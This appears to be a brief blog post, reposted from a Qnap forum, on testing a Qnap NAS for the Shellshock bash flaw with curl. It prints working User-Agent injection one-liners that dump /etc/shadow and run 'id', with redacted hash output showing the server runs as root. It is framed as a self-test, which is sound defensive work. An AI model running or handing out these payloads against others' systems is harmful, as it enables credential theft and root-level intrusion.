Using curl to test Qnap NAS for Shellshock
The following briefly appeared in a Qnap forum, but was apparently quickly removed.
Since I feel it's a useful test, here it is:
Fun Shellshock test with curl
Testing your NAS for the Shellshock vulnerability with curl:
NAS_IP=192.168.1.XXX # Use the IP or the name of your NAS URL=http://$NAS_IP:8080/cgi-bin/index.cgi curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; cat /etc/shadow" $URLAnd enjoy the output of your users and crypted passwords in a format almost ready to be fed to John The Ripper:
admin:$1$$abc...:14233:0:99999:7::: guest:$1$$abc...:14233:0:99999:7::: httpdusr:!:16087:0:99999:7::: otheruser:$1$$abc...:16087:0:99999:7::: TimeMachine:$1$$abc...:16087:0:99999:7::: Location:/cgi-bin/login.html?20130912(The password hashes have been redacted in this output of course)
If your NAS can be reached from the Internet, you better disconnect it now...
What this also shows is that the NAS http server appears to be running as root, since the /etc/shadow file should only be readable by root!
And indeed:
$ curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; id" $URL uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
this shows the id of the web server process as "admin", with UID 0 and GID 0. So it's really running as root, which is certainly very helpful for NAS-hackers.
0 Comments:
Post a Comment
<< Home